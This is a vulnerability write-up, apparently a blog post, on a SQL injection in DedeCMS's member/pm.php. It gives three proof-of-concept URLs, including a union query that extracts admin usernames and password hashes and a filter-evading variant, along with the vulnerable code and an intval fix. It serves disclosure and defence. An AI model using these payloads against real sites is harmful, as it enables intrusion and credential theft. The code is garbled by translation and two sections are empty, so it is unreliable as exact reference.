dedecms/member/pm.php SQL Injection Vul

Catalog

1 . Vulnerability Description 2 . Vulnerability trigger Condition 3 . Vulnerability Impact Range 4 . Vulnerability Code Analysis 5 . Defense Methods 6. Defensive thinking

1. Vulnerability description

DEDECMS Member Center Injection vulnerability

Relevant Link

http://www.05112.com/anquan/ldfb/sql/2014/0209/7723.html

2. Vulnerability Trigger Condition

0x1:poc1

http://127.0.0.1/dedecms5.5/member/pm.php?dopost=read&id=1 ' and char (@ ') and 1=2+union+select 1,2,3,4,5,6,7,8,9,10,11,12%20%23

0x2:poc2

If error: Safe alert:request error Step 1!

http://127.0.0.1/dedecms5.5/member/pm.php?dopost=read&id=1′and char (@ "') and 1=2+/*! 50000union*/+/*!50000select*/+1,2,3,4,5,6,userid,8,9,10,11,pwd+from+ '%[email protected]__admin '%23

0x3:poc3

Error injection

http://127.0.0.1/dedecms5.5/member/pm.php?dopost=read&id=1′and @ ' and (select 1 from (SELECT COUNT (* ), concat (User (), Floor (rand (0) *)) x from Information_schema.tables Group by X) a) and ' 1 ' = ' 1

Relevant Link

http://www.myhack58.com/Article/html/3/62/2014/42255.htm

3. Vulnerability Impact Range
4. Vulnerability Code Analysis

/member/pm.php

Else if($dopost = ='Read') {$sql="SELECT * from ' #@__member_friends ' WHERE mid= ' {$cfg _ml-> M_ID} ' and ftype!= '-1 ' ORDER by Addtime DESC LIMIT"; $friends=Array (); $dsql->    Setquery ($sql); $dsql->    Execute ();  while($row = $dsql-> GetArray ()) {$friends []=$row; }    //$id Injection$row = $dsql-> GetOne ("SELECT * from ' #@__member_pms ' WHERE id= ' $id ' and (fromid= ' {$cfg _ml-> m_id} ' OR toid= ' {$cfg _ml-> M_ID} ')");//ID not filtered    if(!Is_array ($row)) {ShowMsg ('Sorry, the message you specified does not exist or you do not have permission to view it! ','-1');    Exit (); }    //$id Injection$dsql-> Executenonequery ("UPDATE ' #@__member_pms ' SET hasview=1 WHERE id= ' $id ' and folder= ' Inbox ' and toid= ' {$cfg _ml-> M_ID} '"); $dsql-> Executenonequery ("UPDATE ' #@__member_pms ' SET hasview=1 WHERE folder= ' outbox ' and toid= ' {$cfg _ml-> M_ID} '"); Include_once (DirName (__file__).'/templets/pm-read.htm'); Exit ();}

Relevant Link

http://0day5.com/archives/1313

5. Defense Methods

/member/pm.php

Else if($dopost = ='Read') {$sql="Select * from ' #@__member_friends ' where mid= ' {$cfg _ml->m_id} ' and ftype!= '-1 ' ORDER BY addtime desc limit 20"; $friends=Array (); $dsql-setquery ($sql); $dsql-Execute ();  while($row = $dsqlGetArray ()) {$friends []=$row; }    /*$id Filtration*/$id=intval ($id); /* */$row= $dsql->getone ("Select * from ' #@__member_pms ' where id= ' $id ' and (fromid= ' {$cfg _ml->m_id} ' Or toid= ' {$cfg _ml->m_id} ')"); if(!Is_array ($row)) {ShowMsg ('Sorry, the message you specified does not exist or you do not have permission to view it! ','-1');    Exit (); } $dsql->executenonequery ("Update ' #@__member_pms ' set hasview=1 where id= ' $id ' and folder= ' Inbox ' and toid= ' {$cfg _ml->m_id} '"); $dsql->executenonequery ("Update ' #@__member_pms ' set hasview=1 where folder= ' Outbox ' and toid= ' {$cfg _ml->m_id} '"); Include_once (DirName (__file__).'/templets/pm-read.htm'); Exit ();}

6. Defensive Thinking

Copyright (c) Littlehann All rights reserved

dedecms/member/pm.php SQL Injection Vul